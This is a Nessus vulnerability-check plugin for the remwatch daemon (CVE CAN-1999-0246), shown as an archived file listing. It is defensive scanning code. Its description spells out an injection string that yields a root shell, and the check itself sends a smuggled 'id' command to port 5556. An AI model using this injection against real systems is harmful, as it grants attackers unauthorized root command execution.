home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / remwatch.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  82 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10202);
  10. script_cve_id("CAN-1999-0246");
  11.  script_version ("$Revision: 1.11 $");
  12.  name["english"] = "remwatch";
  13.  name["francais"] = "remwatch";
  14.  script_name(english:name["english"],
  15.           francais:name["francais"]);
  16.  
  17.  desc["english"] = "
  18. remwatch is installed and allows anyone to execute
  19. arbitrary commands.
  20.  
  21. An attacker may issue shell commands as root by
  22. connecting to the remwatch daemon, and issue
  23. the command : ' 11T ; /bin/ksh'.
  24.  
  25. Solution : deactivate the remwatch service. 
  26. Contact your vendor for a patch.
  27.  
  28. Risk factor : High";
  29.  
  30. desc["francais"] = "
  31. remwatch est installΘ et permet d'executer des commandes
  32. arbitraires.
  33.  
  34. Un pirate peut executer des commandes shell en tant que
  35. root en se connectant au serveur remwatch, et en envoyant
  36. la commande : ' 11T ;/bin/ksh'.
  37.  
  38. Solution : dΘsactivez ce service et contactez votre vendeur
  39. pour un patch.
  40.  
  41. Facteur de risque : ElevΘ";
  42.  
  43.  script_description(english:desc["english"],
  44.              francais:desc["francais"]);
  45.  
  46.  summary["english"] = "Executes 'id' thanks to remwatch";
  47.  summary["francais"] = "Execute 'id' grace α remwatch";
  48.  script_summary(english:summary["english"],
  49.          francais:summary["francais"]);
  50.  
  51.  script_category(ACT_GATHER_INFO);
  52.  
  53.  
  54.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  55.            francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  56.  
  57.  family["english"] = "Gain root remotely";
  58.  family["francais"] = "Passer root α distance";
  59.  
  60.  script_family(english:family["english"],
  61.             francais:family["francais"]);
  62.  script_dependencie("find_service.nes");
  63.  script_require_ports(5556);
  64.  exit(0);
  65. }
  66.  
  67. #
  68. # The script code starts here
  69. #
  70.  
  71. port = 5556;
  72. if(!get_port_state(port))exit(0);
  73. soc = open_sock_tcp(port);
  74. if(soc)
  75. {
  76.  s = string(" 11T ;id\n");
  77.  send(socket:soc, data:s);
  78.  b = recv(socket:soc, length:1024);
  79.  if("uid=" >< b)security_hole(port);
  80.  close(soc);
  81. }
  82.